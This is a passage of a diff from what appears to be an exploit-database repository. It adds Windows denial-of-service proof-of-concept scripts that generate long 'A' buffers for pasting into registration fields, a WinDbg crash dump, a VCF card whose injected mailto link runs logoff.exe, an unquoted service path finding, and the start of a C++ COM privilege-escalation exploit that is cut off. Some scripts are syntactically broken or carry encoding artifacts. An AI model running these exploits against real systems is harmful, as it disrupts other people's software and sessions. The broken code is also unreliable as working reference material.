+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47856.py

@@ -0,0 +1,33 @@
+# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Dnss
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.Dnss Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47857.py

@@ -0,0 +1,33 @@
+# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install BlueAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.BlueAuditor Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47859.py

@@ -0,0 +1,33 @@
+# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install ShareAlarmPro
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.ShareAlarmPro Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47860.py

@@ -0,0 +1,33 @@
+# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NetShareWatcher
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.NetShareWatcher Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47861.py

@@ -0,0 +1,33 @@
+# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Dnss
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.Dnss Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47862.py

@@ -0,0 +1,28 @@
+# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC)
+# Date: 2020-05-01
+# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
+# Software Link:  https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
+# Exploit Author: Achilles
+# Tested Version: 3.1.1
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :TextCrawler.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open TextCrawler Pro
+# 4.- Paste the content of EVIL.txt into the Field: 'License key'
+# 5.- Click 'Activate' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer =3D "\x41" * 6000
+
+try:
+open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"

exploits/windows/dos/47863.py

@@ -0,0 +1,33 @@
+# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install RemShutdown
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.RemShutdown Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47864.py

@@ -0,0 +1,33 @@
+# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Backup Key Recovery
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.Backup Key Recovery Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47865.py

@@ -0,0 +1,33 @@
+# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install RemShutdown
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.RemShutdown Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47866.py

@@ -0,0 +1,33 @@
+# Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install NBMonitor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.NBMonitor Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47867.py

@@ -0,0 +1,63 @@
+# Exploit Title: Office Product Key Finder 1.5.4 - Denial of Service (PoC)
+# Date: 2020-01-06
+# Vendor Homepage: http://www.nsauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
+# Exploit Author: Gokkul
+# Tested Version: v1.5.4
+# Tested on: Windows 7 x64
+
+# Software Description:
+# Office Product Key Finder is offline product key finder software and allows to recover and
+# find microsoft office 25 character product key for Microsoft Office 2013, Microsoft Office 2010,
+# Microsoft Office 2007 and Microsoft Office 2003 installed on your PC or on network computers.
+
+
+# 1.- Download and install Office Product Key Finder
+# 2.- Run python code : Office Product Key Finder.py
+
+#!/usr/bin/env python
+DoS=("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+myfile=open('CRASHER.txt','w')
+myfile.writelines(Dos)
+myfile.close()
+print("File created")
+
+# 3.- Open CRASHER.txt and copy content to clipboard
+# 4.- Open Office Product Key Finder and under the Register tab Click 'Enter Registration Code'
+# 5.- Paste the content of CRASHER.txt into the Field: 'Name and Key'
+# 6.- click 'OK' you will see a crash.

exploits/windows/dos/47868.py

@@ -0,0 +1,33 @@
+# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotFTP
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotFTP Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47869.py

@@ -0,0 +1,33 @@
+# Exploit Title: SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)
+# Exploit Author: Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotmsn_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotMSN
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotMSN Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47870.py

@@ -0,0 +1,33 @@
+# Exploit Title: SpotIM 2.2 - 'Name' Denial Of Service
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotim_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotIM
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotIM Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47871.txt

@@ -0,0 +1,153 @@
+# Exploit Title: FTPGetter Professional 5.97.0.223 -  Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://www.ftpgetter.com/
+# Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe
+# Version: v.5.97.0.223
+# Tested on: Windows 7
+# CVE : N/A
+
+==================================================================
+THE BUG : NULL pointer dereference -> DOS crash
+==================================================================
+
+The FTPGetter Professional v.5.97.0.223 FTP client suffers from a
+NULL pointer dereference vulnerability via the program not properly
+handling user input when setting the field "Run program" under
+profile properties, it triggers when executing the profile.
+
+==================================================================
+DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183
+==================================================================
+...
+...
+==================================================================
+WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES
+==================================================================
+
+(b84.e88): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001
+eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FTPGetter.exe -
+FTPGetter!Xtermforminitialization$qqrv+0x202d74:
+00855994 8b5004          mov     edx,dword ptr [eax+4] ds:0023:00000004=????????
+
+0:000> !analyze -v
+*******************************************************************************
+*                                                                             *
+*                        Exception Analysis                                   *
+*                                                                             *
+*******************************************************************************
+
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ftpgcore.dll -
+Failed calling InternetOpenUrl, GLE=12007
+
+FAULTING_IP:
+FTPGetter!Xtermforminitialization$qqrv+202d74
+00855994 8b5004          mov     edx,dword ptr [eax+4]
+
+EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
+ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 00000000
+   Parameter[1]: 00000004
+Attempt to read from address 00000004
+
+FAULTING_THREAD:  00000e88
+
+PROCESS_NAME:  FTPGetter.exe
+
+ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
+
+EXCEPTION_PARAMETER1:  00000000
+
+EXCEPTION_PARAMETER2:  00000004
+
+READ_ADDRESS:  00000004
+
+FOLLOWUP_IP:
+FTPGetter!Xtermforminitialization$qqrv+202d74
+00855994 8b5004          mov     edx,dword ptr [eax+4]
+
+MOD_LIST: <ANALYSIS/>
+
+NTGLOBALFLAG:  0
+
+APPLICATION_VERIFIER_FLAGS:  0
+
+BUGCHECK_STR:  APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ
+
+PRIMARY_PROBLEM_CLASS:  NULL_CLASS_PTR_DEREFERENCE
+
+DEFAULT_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE
+
+LAST_CONTROL_TRANSFER:  from 00812591 to 00855994
+
+STACK_TEXT:
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74
+0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971
+0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1
+0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60
+0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186
+0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23
+0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b
+0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357
+0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf
+0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074
+0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7
+0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6
+0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f
+0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7
+0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe
+0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70
+0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+SYMBOL_STACK_INDEX:  0
+
+SYMBOL_NAME:  ftpgetter!Xtermforminitialization$qqrv+202d74
+
+FOLLOWUP_NAME:  MachineOwner
+
+MODULE_NAME: FTPGetter
+
+IMAGE_NAME:  FTPGetter.exe
+
+DEBUG_FLR_IMAGE_TIMESTAMP:  5dffa0bd
+
+STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb
+
+FAILURE_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv
+
+BUCKET_ID:  APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74
+
+WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1
+
+Followup: MachineOwner
+---------
+
+NULL pointer
+
+FOLLOWUP_IP:
+REDftp!Xtermforminitialization$qqrv+202d74
+00855994 8b5004          mov     edx,dword ptr [eax+4]
+
+Stepping into and running
+
+eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000
+eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0         nv up ei pl nz ac pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
+REDftp!GetFTPValidationW+0x6e842:
+004db97a 837a5400        cmp     dword ptr [edx+54h],0 ds:0023:41414195=????????
+
+==================================================================
+CVE-2020-5183 is a NULL pointer dereference vulnerability
+==================================================================

exploits/windows/dos/47873.py

@@ -0,0 +1,26 @@
+# Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC)
+# Date: 2020-01-05
+# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
+# Software Link:  https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 4.1.3
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Duplicate Cleaner Pro
+# 4.- Paste the content of EVIL.txt into the Field: 'License key'
+# 5.- Click 'Activate' and you will see a crash.
+
+#!/usr/bin/env python
+buffer =3D "\x41" * 6000
+
+try:
+f.open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"

exploits/windows/dos/47878.txt

@@ -0,0 +1,93 @@
+# Exploit Title: Microsoft Outlook VCF cards - Denial of Service (PoC)
+# Date: 2020-01-04
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.microsoft.com
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec     
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+A VCF file is a standard file format for storing contact information for a person or business.
+Microsoft Outlook supports the vCard and vCalendar features.
+These are a powerful new approach to electronic Personal Data Interchange (PDI).
+
+
+[Vulnerability Type]
+Mailto Link Denial Of Service
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Windows VCF cards do not properly sanitize email addresses allowing for HTML injection.
+A corrupt VCF card can cause all the users currently opened files and applications to be closed
+and their session to be terminated without requiring any accompanying attacker supplied code. 
+
+This can be done by crafting the Mailto link to point to Windows "logoff.exe". The corrupt VCF card can then
+kill all users applications and also log the target off their computer, if the VCF card is opened in
+using Windows Contacts and the link is clicked.
+
+The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args.
+
+This probably will affect Windows 7 the most as Windows 10 can possibly default opening VCF files in other programs
+like (People). However, users can possibly still choose to open the VCF in Contacts by right-click the file.
+
+Note, this exploit requires user interaction.
+
+[Exploit/POC]
+"VCF_DoS.py"
+
+dirty_vcf=(
+'BEGIN:VCARD\n'
+'VERSION:4.0\n'
+'FN:Session Terminate PoC - ApparitionSec\n'
+'EMAIL:<a href="logoff">DoS@microsoft.com</a>\n'
+'END:VCARD')
+
+f=open("DoS.vcf", "w")
+f.write(dirty_vcf)
+f.close()
+
+print "VCF Denial Of Service card created!"
+print "By hyp3rlinx"
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=P4OGN7pZLSg
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: January 2, 2020
+MSRC : "In order to investigate your report I will need an explanation on how an attacker could use the information
+        to exploit another user remotely without the use of social engineering... As such, this thread is being closed"
+      : January 3, 2020
+January 4, 2020 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/local/47852.txt

@@ -0,0 +1,24 @@
+#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2020-01-05
+#Vendor Homepage : http://webcompanion.com/
+#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
+#Tested on OS: Windows 10
+
+
+#Analyze PoC :
+==============
+
+C:\Users\ZwX>sc qc WCAssistantService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: WCAssistantService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : WC Assistant
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

exploits/windows/local/47880.cc

@@ -0,0 +1,270 @@
+// Axel '0vercl0k' Souchet - December 28 2019
+// References:
+//  - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun
+//    - https://www.zerodayinitiative.com/blog/2019/12/19/privilege-escalation-via-the-core-shell-com-registrar-object
+//  - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sserver/sserver.cpp
+//  - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sclient/sclient.cpp
+
+#include <windows.h>
+#include <cstdint>
+#include <atlbase.h>
+
+// 54E14197-88B0-442F-B9A3-86837061E2FB
+// .rdata:0000000000014108 CLSID_CoreShellComServerRegistrar dd 54E14197h  ; Data1
+// .rdata:0000000000014108   dw 88B0h                                      ; Data2
